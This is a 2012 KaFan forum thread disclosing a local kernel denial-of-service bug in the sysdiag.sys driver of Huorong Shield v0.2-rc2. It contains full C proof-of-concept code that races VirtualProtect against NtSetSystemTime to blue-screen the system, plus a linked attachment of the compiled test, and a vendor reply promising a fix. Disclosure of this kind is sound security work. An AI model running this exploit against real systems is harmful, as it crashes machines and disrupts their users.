查看: 12997|回复: 29
收起左侧

[讨论] 火绒盾v0.2-rc2 sysdiag.sys <=0.0.0.1 本地内核拒绝服务漏洞

   关闭 [复制链接]
LockeHIPS
头像被屏蔽
发表于 2012-3-30 14:30:09 | 显示全部楼层 |阅读模式
本帖最后由 LockeHIPS 于 2012-3-30 14:31 编辑

火绒盾v0.2-rc2 sysdiag.sys <=0.0.0.1 本地内核拒绝服务漏洞

存在漏洞的软件:火绒盾v0.2-rc2及以下版本
存在漏洞的组件:sysdiag.sys <=0.0.0.1

漏洞原理:火绒盾安全软件的核心驱动程序sysdiag.sys没有正确处理参数,使用了不恰当的处理方式,在竞争条件下可能访问异常的内存,导致在任意用户权限下可引发系统蓝屏崩溃

同样类似的漏洞在火绒盾的核心驱动中大概还存在十几处。

验证代码:

  1. #include "stdafx.h"
  2. #include "windows.h"
  3. DWORD __stdcall thread1(PVOID pMem)
  4. {

  5.         SetThreadPriority(GetCurrentThread() , THREAD_PRIORITY_HIGHEST);
  6.         while(TRUE)
  7.         {
  8.                 DWORD oldp ;
  9.                 VirtualProtect(pMem , 0x1000 , PAGE_NOACCESS , &oldp );       
  10.         }
  11. }
  12. int main(int argc, char* argv[])
  13. {
  14.         DWORD oldp;
  15.         PVOID pNtSetSystemTime = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSetSystemTime");

  16.         PVOID pMem = VirtualAlloc(NULL , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);

  17.         DWORD tid ;

  18.         CreateThread(NULL , 0 , thread1 , pMem , 0 , &tid);

  19.         while(TRUE)
  20.         {
  21.                 VirtualProtect(pMem, 0x1000 , PAGE_READWRITE , &oldp);

  22.                 __asm
  23.                 {
  24.                         push 0
  25.                         push pMem
  26.                         call pNtSetSystemTime
  27.                 }
  28.         }

  29.         return 0;
  30. }
复制代码
验证程序见附件,解压密码是huorongdun,在安装了火绒盾的系统上,以任意用户权限运行一段时间系统就会蓝屏
虚拟机或单核系统会慢一些,双核系统会快一些,但应该都不超过10分钟就会蓝屏
dossysdig_1.rar (10.25 KB, 下载次数: 321)

评分

参与人数 1魅力 +1 收起 理由
边缘vip + 1 版区有你更精彩: )

查看全部评分

china_killer
发表于 2012-3-30 14:42:28 | 显示全部楼层
感谢360的朋友测试并帮我们发现问题,我们下版升级处理这种情况。。。 欢迎继续测试帮助我们发现产品问题
sanhu35
发表于 2012-3-30 14:33:10 | 显示全部楼层
支持一下
天原
发表于 2012-3-30 14:49:28 来自手机 | 显示全部楼层
来访客人…360的朋友………
单身熟男 该用户已被删除
发表于 2012-3-30 15:02:50 | 显示全部楼层
mj又开大招了
844416405
发表于 2012-3-30 18:38:20 | 显示全部楼层
难道LZ是MJ?
yyt3150
发表于 2012-3-30 21:13:20 | 显示全部楼层
作者一眼就看出来了。。。。因为这么专业的问题多半都是官人才会认真研究!!
AIRSHAPE
发表于 2012-3-30 22:19:13 | 显示全部楼层
MJ来啦 嘿嘿
firefox3
发表于 2012-3-30 22:44:39 | 显示全部楼层
大牛!
左手
发表于 2012-3-31 21:39:14 | 显示全部楼层
又见MJ大牛。
不过这个火盾的思想是单步加多步。我挺喜欢的。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 14:22 , Processed in 0.150602 second(s), 22 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表